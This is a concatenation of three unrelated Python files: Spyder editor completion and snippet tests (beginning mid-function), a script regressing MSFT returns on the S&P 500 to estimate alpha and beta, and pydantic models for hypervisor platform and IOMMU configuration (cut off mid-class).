    # qtbot.wait(30000)
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    # Python >= 3.8 renamed hypot's parameters to *coordinates.
    if PY2:
        assert "hypot(x, y)" in [x['label'] for x in sig.args[0]]
    else:
        assert [x['label'] for x in sig.args[0]][0] in ["hypot(x, y)",
                                                        "hypot(*coordinates)"]
    assert code_editor.toPlainText() == 'import math\nmath.hypot'
    qtbot.keyPress(code_editor, Qt.Key_Escape)
    try:
        with qtbot.waitSignal(completion.sig_show_completions,
                              timeout=10000) as sig:
            qtbot.keyPress(code_editor, Qt.Key_Tab)
    except pytestqt.exceptions.TimeoutError:
        # This should generate a timeout error because the completion
        # prefix is the same that the completions returned by Jedi.
        # This is a regression test for spyder-ide/spyder#11600
        pass
    # enter for new line
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    # Complete math.h() -> math.degrees()
    qtbot.keyClicks(code_editor, 'math.h(')
    qtbot.keyPress(code_editor, Qt.Key_Left, delay=300)
    qtbot.keyClicks(code_editor, 'y')
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    if PY2:
        assert "hypot(x, y)" in [x['label'] for x in sig.args[0]]
    else:
        assert [x['label'] for x in sig.args[0]][0] in ["hypot(x, y)",
                                                        "hypot(*coordinates)"]
    # right for () + enter for new line
    qtbot.keyPress(code_editor, Qt.Key_Right, delay=300)
    qtbot.keyPress(code_editor, Qt.Key_Right, delay=300)
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    assert code_editor.toPlainText() == 'import math\nmath.hypot\n'\
                                        'math.hypot()\n'
    # Complete math.a <tab> ... s <enter> to math.asin
    qtbot.keyClicks(code_editor, 'math.a')
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert "asin(x)" in [x['label'] for x in sig.args[0]]
    # Test if the list is updated
    assert "acos(x)" == completion.completion_list[0]['label']
    qtbot.keyClicks(completion, 's')
    data = completion.item(0).data(Qt.UserRole)
    assert "asin" == data['insertText']
    qtbot.keyPress(completion, Qt.Key_Enter, delay=300)
    # enter for new line
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    assert code_editor.toPlainText() == 'import math\nmath.hypot\n'\
                                        'math.hypot()\nmath.asin\n'
    # Check can get list back
    qtbot.keyClicks(code_editor, 'math.f')
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert completion.count() == 6
    assert "floor(x)" in [x['label'] for x in sig.args[0]]
    qtbot.keyClicks(completion, 'l')
    assert completion.count() == 1
    qtbot.keyPress(completion, Qt.Key_Backspace)
    assert completion.count() == 6
    # enter for new line
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    assert code_editor.toPlainText() == 'import math\nmath.hypot\n'\
                                        'math.hypot()\nmath.asin\n'\
                                        'math.f\n'
    # Complete math.a <tab> s ...<enter> to math.asin
    qtbot.keyClicks(code_editor, 'math.a')
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
        qtbot.keyPress(code_editor, 's')
    assert "asin(x)" in [x['label'] for x in sig.args[0]]
    qtbot.keyPress(completion, Qt.Key_Enter, delay=300)
    # enter for new line
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    assert code_editor.toPlainText() == 'import math\nmath.hypot\n'\
                                        'math.hypot()\nmath.asin\n'\
                                        'math.f\nmath.asin\n'
    # Complete math.a|angle <tab> s ...<enter> to math.asin|angle
    qtbot.keyClicks(code_editor, 'math.aangle')
    for i in range(len('angle')):
        qtbot.keyClick(code_editor, Qt.Key_Left)
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
        qtbot.keyPress(code_editor, 's')
    assert "asin(x)" in [x['label'] for x in sig.args[0]]
    qtbot.keyPress(completion, Qt.Key_Enter, delay=300)
    for i in range(len('angle')):
        qtbot.keyClick(code_editor, Qt.Key_Right)
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    assert code_editor.toPlainText() == 'import math\nmath.hypot\n'\
                                        'math.hypot()\nmath.asin\n'\
                                        'math.f\nmath.asin\n'\
                                        'math.asinangle\n'
    # Check math.a <tab> <backspace> <escape> do not emit sig_show_completions
    qtbot.keyClicks(code_editor, 'math.a')
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()
    try:
        with qtbot.waitSignal(completion.sig_show_completions,
                              timeout=5000) as sig:
            qtbot.keyPress(code_editor, Qt.Key_Tab)
            qtbot.keyPress(code_editor, Qt.Key_Backspace)
            qtbot.keyPress(code_editor, Qt.Key_Escape)
        raise RuntimeError("The signal should not have been received!")
    except pytestqt.exceptions.TimeoutError:
        pass
    try:
        with qtbot.waitSignal(completion.sig_show_completions,
                              timeout=5000) as sig:
            qtbot.keyPress(code_editor, Qt.Key_Tab)
            qtbot.keyPress(code_editor, Qt.Key_Return)
        raise RuntimeError("The signal should not have been received!")
    except pytestqt.exceptions.TimeoutError:
        pass
    assert code_editor.toPlainText() == 'import math\nmath.hypot\n'\
                                        'math.hypot()\nmath.asin\n'\
                                        'math.f\nmath.asin\n'\
                                        'math.asinangle\n'\
                                        'math.\n'
    code_editor.toggle_automatic_completions(True)
    code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.skipif(not rtree_available or PY2 or os.name == 'nt',
                    reason='Only works if rtree is installed')
def test_code_snippets(lsp_codeeditor, qtbot):
    """Exercise snippet expansion and placeholder navigation.

    Completes a locally defined function into a snippet, then tabs
    through, edits, deletes and undoes/redoes its placeholder regions.
    """
    assert rtree_available
    code_editor, lsp = lsp_codeeditor
    completion = code_editor.completion_widget
    snippets = code_editor.editor_extensions.get('SnippetsExtension')
    CONF.set('lsp-server', 'code_snippets', True)
    lsp.update_configuration()
    code_editor.toggle_automatic_completions(False)
    code_editor.toggle_code_snippets(True)
    # Set cursor to start
    code_editor.go_to_line(1)
    # Source function whose signature provides the snippet placeholders.
    text = """
    def test_func(xlonger, y1, some_z):
        pass
    """
    text = textwrap.dedent(text)
    code_editor.insert_text(text)
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    qtbot.keyClicks(code_editor, 'test_')
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert 'test_func(xlonger, y1, some_z)' in {
        x['label'] for x in sig.args[0]}
    expected_insert = 'test_func(${1:xlonger}, ${2:y1}, ${3:some_z})$0'
    insert = sig.args[0][0]
    assert expected_insert == insert['insertText']
    assert snippets.is_snippet_active
    assert code_editor.has_selected_text()
    # Rotate through snippet regions
    cursor = code_editor.textCursor()
    arg1 = cursor.selectedText()
    assert 'xlonger' == arg1
    assert snippets.active_snippet == 1
    qtbot.keyPress(code_editor, Qt.Key_Tab)
    cursor = code_editor.textCursor()
    arg2 = cursor.selectedText()
    assert 'y1' == arg2
    assert snippets.active_snippet == 2
    qtbot.keyPress(code_editor, Qt.Key_Tab)
    cursor = code_editor.textCursor()
    arg2 = cursor.selectedText()
    assert 'some_z' == arg2
    assert snippets.active_snippet == 3
    qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert not snippets.is_snippet_active
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    qtbot.keyClicks(code_editor, 'test_')
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    # Replace selection
    qtbot.keyClicks(code_editor, 'arg1')
    qtbot.wait(5000)
    # Snippets are disabled when there are no more left
    for _ in range(0, 3):
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert not snippets.is_snippet_active
    cursor = code_editor.textCursor()
    cursor.movePosition(QTextCursor.StartOfBlock)
    cursor.movePosition(QTextCursor.EndOfBlock, mode=QTextCursor.KeepAnchor)
    text1 = cursor.selectedText()
    assert text1 == 'test_func(arg1, y1, some_z)'
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    qtbot.keyClicks(code_editor, 'test_')
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert snippets.active_snippet == 2
    # Extend text from right
    qtbot.keyPress(code_editor, Qt.Key_Right, delay=300)
    qtbot.keyClicks(code_editor, '_var')
    qtbot.keyPress(code_editor, Qt.Key_Up, delay=300)
    qtbot.keyPress(code_editor, Qt.Key_Down, delay=300)
    cursor = code_editor.textCursor()
    cursor.movePosition(QTextCursor.StartOfBlock)
    cursor.movePosition(QTextCursor.EndOfBlock, mode=QTextCursor.KeepAnchor)
    text1 = cursor.selectedText()
    assert text1 == 'test_func(xlonger, y1_var, some_z)'
    cursor.movePosition(QTextCursor.EndOfBlock)
    code_editor.setTextCursor(cursor)
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    qtbot.keyClicks(code_editor, 'test_')
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    for _ in range(0, 2):
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert snippets.active_snippet == 3
    # Extend text from left
    qtbot.keyPress(code_editor, Qt.Key_Left, delay=300)
    qtbot.keyClicks(code_editor, 's')
    qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert not snippets.is_snippet_active
    cursor = code_editor.textCursor()
    cursor.movePosition(QTextCursor.StartOfBlock)
    cursor.movePosition(QTextCursor.EndOfBlock, mode=QTextCursor.KeepAnchor)
    text1 = cursor.selectedText()
    assert text1 == 'test_func(xlonger, y1, ssome_z)'
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    qtbot.keyClicks(code_editor, 'test_')
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert snippets.active_snippet == 1
    # Delete snippet region
    qtbot.keyPress(code_editor, Qt.Key_Left, delay=300)
    qtbot.keyPress(code_editor, Qt.Key_Backspace, delay=300)
    assert len(snippets.snippets_map) == 3
    qtbot.keyPress(code_editor, Qt.Key_Tab)
    cursor = code_editor.textCursor()
    arg1 = cursor.selectedText()
    assert 'some_z' == arg1
    # Undo action
    with qtbot.waitSignal(code_editor.sig_undo,
                          timeout=10000) as sig:
        code_editor.undo()
    assert len(snippets.snippets_map) == 4
    for _ in range(0, 2):
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    cursor = code_editor.textCursor()
    arg1 = cursor.selectedText()
    assert 'some_z' == arg1
    with qtbot.waitSignal(code_editor.sig_redo,
                          timeout=10000) as sig:
        code_editor.redo()
    assert len(snippets.snippets_map) == 3
    for _ in range(0, 3):
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    qtbot.keyPress(code_editor, Qt.Key_Right)
    qtbot.keyPress(code_editor, Qt.Key_Enter)
    qtbot.keyPress(code_editor, Qt.Key_Backspace)
    qtbot.keyClicks(code_editor, 'test_')
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    # Delete text
    qtbot.keyPress(code_editor, Qt.Key_Left, delay=300)
    qtbot.keyPress(code_editor, Qt.Key_Right, delay=300)
    qtbot.keyPress(code_editor, Qt.Key_Backspace)
    for _ in range(0, 3):
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    cursor = code_editor.textCursor()
    cursor.movePosition(QTextCursor.StartOfBlock)
    cursor.movePosition(QTextCursor.EndOfBlock, mode=QTextCursor.KeepAnchor)
    text1 = cursor.selectedText()
    assert text1 == 'test_func(longer, y1, some_z)'
    # Restore defaults for subsequent tests.
    CONF.set('lsp-server', 'code_snippets', False)
    lsp.update_configuration()
    code_editor.toggle_automatic_completions(True)
    code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.skipif((not rtree_available
                     or not check_if_kite_installed()
                     or not check_if_kite_running()),
                    reason="Only works if rtree is installed."
                    "It's not meant to be run without kite installed "
                    "and runnning")
def test_kite_code_snippets(kite_codeeditor, qtbot):
    """
    Test kite code snippets completions without initial placeholder.
    See spyder-ide/spyder#10971
    """
    assert rtree_available
    code_editor, kite = kite_codeeditor
    completion = code_editor.completion_widget
    snippets = code_editor.editor_extensions.get('SnippetsExtension')

    # Enable snippets and the Kite provider; disable automatic completions
    # so the test controls exactly when completions are requested.
    CONF.set('lsp-server', 'code_snippets', True)
    CONF.set('kite', 'enable', True)
    code_editor.toggle_automatic_completions(False)
    code_editor.toggle_code_snippets(True)
    kite.update_configuration()

    # Set cursor to start
    code_editor.go_to_line(1)
    qtbot.keyClicks(code_editor, 'import numpy as np')
    qtbot.keyPress(code_editor, Qt.Key_Return)
    qtbot.keyClicks(code_editor, 'np.sin')

    # Request completions for 'np.sin'.
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)

    # Kite renders the argument position as an ellipsis in the label.
    assert 'sin('+u'\u2026'+')' in {
        x['label'] for x in sig.args[0]}
    expected_insert = 'sin($1)$0'
    insert = sig.args[0][0]
    assert expected_insert == insert['insertText']

    # Insert completion
    qtbot.wait(500)
    qtbot.keyPress(completion, Qt.Key_Tab)
    assert snippets.is_snippet_active

    # Get code selected text: the first tabstop has no initial
    # placeholder, so nothing should be selected.
    cursor = code_editor.textCursor()
    arg1 = cursor.selectedText()
    assert '' == arg1
    assert snippets.active_snippet == 1

    # Request completions again inside the parentheses.
    code_editor.set_cursor_position('eol')
    qtbot.keyPress(code_editor, Qt.Key_Left)
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig2:
        code_editor.do_completion()
    assert '<x>)' in {x['label'] for x in sig2.args[0]}
    expected_insert = '${1:[x]})$0'
    insert = sig2.args[0][0]
    assert expected_insert == insert['textEdit']['newText']
    qtbot.keyPress(completion, Qt.Key_Tab)

    # Snippets are disabled when there are no more left
    code_editor.set_cursor_position('eol')
    qtbot.keyPress(code_editor, Qt.Key_Enter)
    assert not snippets.is_snippet_active

    # The previous line should now hold the fully expanded call.
    cursor = code_editor.textCursor()
    cursor.movePosition(QTextCursor.PreviousBlock)
    cursor.movePosition(QTextCursor.StartOfBlock)
    cursor.movePosition(QTextCursor.EndOfBlock, mode=QTextCursor.KeepAnchor)
    text1 = cursor.selectedText()
    assert text1 == 'np.sin([x])'

    # Restore configuration.
    CONF.set('lsp-server', 'code_snippets', False)
    CONF.set('kite', 'enable', False)
    kite.update_configuration()
    code_editor.toggle_automatic_completions(True)
    code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
def test_completion_order(lsp_codeeditor, qtbot):
    """Check that completions are ordered by relevance to the typed prefix."""
    code_editor, _ = lsp_codeeditor
    completion = code_editor.completion_widget
    code_editor.toggle_automatic_completions(False)

    # Set cursor to start
    code_editor.go_to_line(1)
    qtbot.keyClicks(code_editor, 'impo')
    with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
        code_editor.document_did_change()

    # For the lowercase prefix 'impo', 'import' must be ranked first.
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    first_completion = sig.args[0][0]
    assert first_completion['insertText'] == 'import'

    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    qtbot.keyClicks(code_editor, 'Impo')

    # For the capitalized prefix 'Impo', 'ImportError' must be first.
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    first_completion = sig.args[0][0]
    assert first_completion['insertText'] == 'ImportError'
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.skipif(not sys.platform.startswith('linux') or PY2,
                    reason='Only works on Linux and Python 3')
@flaky(max_runs=5)
def test_fallback_completions(fallback_codeeditor, qtbot):
    """Test fallback completions (document words plus language keywords)."""
    code_editor, _ = fallback_codeeditor
    completion = code_editor.completion_widget
    code_editor.toggle_automatic_completions(False)
    code_editor.toggle_code_snippets(False)

    # Set cursor to start
    code_editor.go_to_line(1)

    # Add some words in comments
    qtbot.keyClicks(code_editor, '# some comment and whole words')
    code_editor.document_did_change()

    # Enter for new line
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=1000)
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyClicks(code_editor, 'wh')
        qtbot.keyPress(code_editor, Qt.Key_Tab, delay=300)

    # Assert all retrieved words start with 'wh'
    assert all({x['insertText'].startswith('wh') for x in sig.args[0]})

    # Delete 'wh'
    for _ in range(2):
        qtbot.keyPress(code_editor, Qt.Key_Backspace)

    # Insert another word
    qtbot.keyClicks(code_editor, 'another')
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyClicks(code_editor, 'a')
        qtbot.keyPress(code_editor, Qt.Key_Tab, delay=300)
    word_set = {x['insertText'] for x in sig.args[0]}
    assert 'another' in word_set

    # Assert that keywords are also retrieved
    assert 'assert' in word_set

    # Delete the typed characters before requesting completions again.
    for _ in range(3):
        qtbot.keyPress(code_editor, Qt.Key_Backspace)
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyClicks(code_editor, 'a')
        qtbot.keyPress(code_editor, Qt.Key_Tab, delay=300)
    word_set = {x['insertText'] for x in sig.args[0]}
    assert 'another' not in word_set

    # Check that fallback doesn't give an error with utf-16 characters.
    # This is a regression test for issue spyder-ide/spyder#11862.
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        code_editor.append("'😒 foobar'")
        qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
        qtbot.keyClicks(code_editor, 'foob')
        qtbot.keyPress(code_editor, Qt.Key_Tab, delay=300)
    word_set = {x['insertText'] for x in sig.args[0]}
    assert 'foobar' in word_set

    # Restore configuration.
    code_editor.toggle_automatic_completions(True)
    code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
def test_text_snippet_completions(snippets_codeeditor, qtbot):
    """Check that text snippets are offered among the completions."""
    code_editor, _ = snippets_codeeditor
    completion = code_editor.completion_widget
    code_editor.toggle_automatic_completions(False)
    code_editor.toggle_code_snippets(False)

    # Set cursor to start
    code_editor.go_to_line(1)
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyClicks(code_editor, 'f')
        qtbot.keyPress(code_editor, Qt.Key_Tab, delay=300)

    # Assert all retrieved words start with 'f'
    assert all({x['sortText'][1] in {'for', 'from'} for x in sig.args[0]})

    # Restore configuration.
    code_editor.toggle_automatic_completions(True)
    code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
def test_kite_textEdit_completions(mock_completions_codeeditor, qtbot):
    """Test textEdit completions such as those returned by the Kite provider.

    This mocks out the completions response, and does not test the Kite
    provider directly.
    """
    code_editor, mock_response = mock_completions_codeeditor
    completion = code_editor.completion_widget
    code_editor.toggle_automatic_completions(False)
    code_editor.toggle_code_snippets(False)

    # Set cursor to start
    code_editor.go_to_line(1)
    qtbot.keyClicks(code_editor, 'my_dict.')

    # Complete my_dict. -> my_dict["dict-key"]
    # The mocked textEdit range replaces the trailing '.' (offsets 7-8).
    mock_response.side_effect = lambda lang, method, params: {'params': [{
        'kind': CompletionItemKind.TEXT,
        'label': '["dict-key"]',
        'textEdit': {
            'newText': '["dict-key"]',
            'range': {
                'start': 7,
                'end': 8,
            },
        },
        'filterText': '',
        'sortText': '',
        'documentation': '',
        'provider': KITE_COMPLETION,
    }]} if method == LSPRequestTypes.DOCUMENT_COMPLETION else None

    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab, delay=300)
    mock_response.side_effect = None

    assert '["dict-key"]' in [x['label'] for x in sig.args[0]]
    qtbot.keyPress(code_editor, Qt.Key_Enter, delay=300)
    assert code_editor.toPlainText() == 'my_dict["dict-key"]\n'

    # Restore configuration.
    code_editor.toggle_automatic_completions(True)
    code_editor.toggle_code_snippets(True)
@pytest.mark.slow
@pytest.mark.first
@flaky(max_runs=5)
@pytest.mark.skipif(os.name == 'nt', reason='Hangs on Windows')
def test_completions_extra_paths(lsp_codeeditor, qtbot, tmpdir):
    """Exercise code completion when adding extra paths."""
    code_editor, lsp_plugin = lsp_codeeditor
    completion = code_editor.completion_widget
    code_editor.toggle_automatic_completions(False)
    code_editor.toggle_code_snippets(False)

    # Create a file to use as extra path
    temp_content = '''
def spam():
    pass
'''
    CONF.set('main', 'spyder_pythonpath', [])
    lsp_plugin.update_configuration()
    qtbot.wait(500)

    qtbot.keyClicks(code_editor, 'import foo')
    qtbot.keyPress(code_editor, Qt.Key_Enter)
    qtbot.keyClicks(code_editor, 'foo.s')
    code_editor.document_did_change()
    qtbot.keyPress(code_editor, Qt.Key_Tab)
    qtbot.wait(500)

    # Without the extra path, 'foo' is unknown and nothing gets completed.
    assert code_editor.toPlainText() == 'import foo\nfoo.s'

    p = tmpdir.mkdir("extra_path")
    extra_paths = [str(p)]
    p = p.join("foo.py")
    p.write(temp_content)

    # Set extra paths
    print(extra_paths)
    CONF.set('main', 'spyder_pythonpath', extra_paths)
    lsp_plugin.update_configuration()
    code_editor.document_did_change()
    qtbot.wait(500)

    # Now 'spam' from the extra-path module should be offered.
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert "spam()" in [x['label'] for x in sig.args[0]]
    assert code_editor.toPlainText() == 'import foo\nfoo.spam'

    # Reset extra paths
    CONF.set('main', 'spyder_pythonpath', [])
    lsp_plugin.update_configuration()
    qtbot.wait(500)
@pytest.mark.slow
@pytest.mark.first
@pytest.mark.skipif(os.environ.get('CI') is None,
                    reason='Run tests only on CI.')
@flaky(max_runs=5)
def test_completions_environment(lsp_codeeditor, qtbot, tmpdir):
    """Exercise code completion when adding extra paths."""
    # NOTE(review): docstring mirrors the previous test; this one actually
    # checks completions against a different Python environment.
    code_editor, lsp_plugin = lsp_codeeditor
    completion = code_editor.completion_widget
    code_editor.toggle_automatic_completions(False)
    code_editor.toggle_code_snippets(False)

    # Get jedi test env: a conda env expected to live next to sys.prefix.
    conda_envs_path = os.path.dirname(sys.prefix)
    conda_jedi_env = os.path.join(conda_envs_path, 'jedi-test-env')
    if os.name == 'nt':
        py_exe = os.path.join(conda_jedi_env, 'python.exe')
    else:
        py_exe = os.path.join(conda_jedi_env, 'bin', 'python')
    print(sys.executable)
    print(py_exe)
    assert os.path.isfile(py_exe)

    # Set environment: with the default interpreter, flask is missing and
    # nothing should be completed.
    set_executable_config_helper()
    lsp_plugin.update_configuration()

    qtbot.keyClicks(code_editor, 'import flas')
    qtbot.keyPress(code_editor, Qt.Key_Tab)
    qtbot.wait(2000)
    assert code_editor.toPlainText() == 'import flas'

    # Reset extra paths
    set_executable_config_helper(py_exe)
    lsp_plugin.update_configuration()

    # In the jedi test env, flask is available and should be completed.
    code_editor.set_text('')
    qtbot.keyClicks(code_editor, 'import flas')
    with qtbot.waitSignal(completion.sig_show_completions,
                          timeout=10000) as sig:
        qtbot.keyPress(code_editor, Qt.Key_Tab)
    assert "flask" in [x['label'] for x in sig.args[0]]
    assert code_editor.toPlainText() == 'import flask'

    # Restore the default interpreter.
    set_executable_config_helper()
    lsp_plugin.update_configuration()
if __name__ == '__main__':
    # Allow running this test module directly, including the slow tests.
    pytest.main(['test_introspection.py', '--run-slow'])
|
"""Estimate a stock's alpha and beta against the S&P 500.

Downloads closing prices from Yahoo Finance, regresses the stock's
returns on the index's returns (statsmodels OLS, scipy.linregress and a
manual covariance/variance computation) and plots the fitted line.
"""
import datetime

import numpy as np
import pandas as pd
from pandas_datareader.data import DataReader
import matplotlib.pyplot as plt
import statsmodels.api as sm
from scipy import stats

# BETA, ALPHA, OLS REGRESSION
stock = 'MSFT'
start_date = datetime.datetime(2014, 12, 28)
end_date = datetime.date.today()

# Daily closing prices for the stock and the index.
df = DataReader(stock, 'yahoo', start_date, end_date)['Close']
sp_500 = DataReader('^GSPC', 'yahoo', start_date, end_date)['Close']

# Joining the closing prices of the two datasets.
# NOTE(review): these are daily observations despite the "monthly" names.
monthly_prices = pd.concat([df, sp_500], axis=1)
monthly_prices.columns = [stock, '^GSPC']

# Calculate returns; the first row is NaN (no prior price) and is dropped.
monthly_returns = monthly_prices.pct_change(1)
clean_monthly_returns = monthly_returns.dropna(axis=0)

# Split dependent and independent variable.
X = clean_monthly_returns['^GSPC']
y = clean_monthly_returns[stock]

# Add a constant to the independent value so the model has an intercept.
X1 = sm.add_constant(X)

# Make regression model, fit it and print results.
model = sm.OLS(y, X1)
results = model.fit()
print(results.summary())

# Alternatively scipy linear regression (same slope/intercept).
slope, intercept, r_value, p_value, std_err = stats.linregress(X, y)

plt.figure(figsize=(14, 7))
X.plot()
y.plot()
plt.ylabel("Daily Returns")
plt.show()

# Manual beta = Cov(X, y) / Var(X).  X and y are already NaN-free, so no
# further dropna() is needed; keep the intermediates in local variables
# instead of mutating the price series `df`.
Xmean = np.mean(X)
ymean = np.mean(y)
xycov = ((X - Xmean) * (y - ymean)).sum()
xvar = ((X - Xmean) ** 2).sum()

# Calculate beta and alpha.
beta = xycov / xvar
alpha = ymean - (beta * Xmean)
print(f'alpha = {alpha}')
print(f'beta = {beta}')

# Generate the fitted regression line over the observed market returns.
xlst = np.linspace(np.min(X), np.max(X), 100)
ylst = np.array([beta * xvl + alpha for xvl in xlst])

# Plot the return scatter plus the fitted line.
# NOTE(review): the third scatter swaps the axes (y vs X) and the axis
# labels look inverted (X is the index, y the company) — confirm intent.
plt.scatter(X, y, alpha=0.5)
plt.scatter(X, y, color='r')
plt.scatter(y, X, color='b')
plt.plot(xlst, ylst, 'k-')
plt.title(f'Percentage Returns for {stock} against the S&P 500')
plt.xlabel('Company')
plt.ylabel('S&P 500')
plt.grid()

# Center the axes at the origin.
ax = plt.gca()
ax.spines['top'].set_color('none')
ax.spines['bottom'].set_position('zero')
ax.spines['left'].set_position('zero')
ax.spines['right'].set_color('none')
plt.show()
# FIXME: Dicts should be replaced by OrderedDict when 3.6 support is dropped
from pathlib import Path
from typing import Dict, List, Optional, Union
from pydantic import BaseModel
from pydantic.networks import IPvAnyInterface, IPvAnyNetwork
from typing_extensions import Literal
from .board import (
Board,
DeviceMemoryRegion,
HypervisorMemoryRegion,
MemoryRegion,
ShMemNetRegion,
)
from .datatypes import ByteSize, ExpressionInt, HexInt, IntegerList
class DebugConsole(BaseModel):
    """Debug console device: base address, size, type and flag strings."""

    address: HexInt
    size: ByteSize
    type: str
    flags: List[str]  # FIXME: Use list of ENUM
class AMDIOMMUConfig(BaseModel):
    """AMD-flavoured IOMMU unit parameters (all optional)."""

    bdf: Optional[ExpressionInt]  # PCI bus/device/function of the unit
    base_cap: Optional[HexInt]
    msi_cap: Optional[HexInt]
    features: Optional[ExpressionInt]
class TIPVUIOMMUConfig(BaseModel):
    """IOMMU unit parameters for the TI PVU variant (per the class name)."""

    tlb_base: Optional[ExpressionInt]
    tlb_size: Optional[ByteSize]
class IOMMUConfig(BaseModel):
    """Generic IOMMU unit with an optional arch-specific extension."""

    type: Optional[str]
    base: Optional[HexInt]
    size: Optional[ByteSize]
    # Architecture-specific part (AMD or TI PVU), if any.
    arch: Union[AMDIOMMUConfig, TIPVUIOMMUConfig, None] = None
class PlatformInfoArm(BaseModel):
    """ARM-specific platform details: GIC base addresses and IOMMU units."""

    maintenance_irq: Optional[ExpressionInt]
    gic_version: Optional[ExpressionInt]
    gicd_base: Optional[HexInt]
    gicc_base: Optional[HexInt]
    gich_base: Optional[HexInt]
    gicv_base: Optional[HexInt]
    gicr_base: Optional[HexInt]
    iommu_units: List[IOMMUConfig] = []
class PlatformInfoX86(BaseModel):
    """x86-specific platform details (timers, APIC) and IOMMU units."""

    pm_timer_address: Optional[HexInt]
    vtd_interrupt_limit: Optional[ExpressionInt]
    apic_mode: Optional[HexInt]
    tsc_khz: Optional[ExpressionInt]
    apic_khz: Optional[ExpressionInt]
    iommu_units: List[IOMMUConfig] = []
class PlatformInfo(BaseModel):
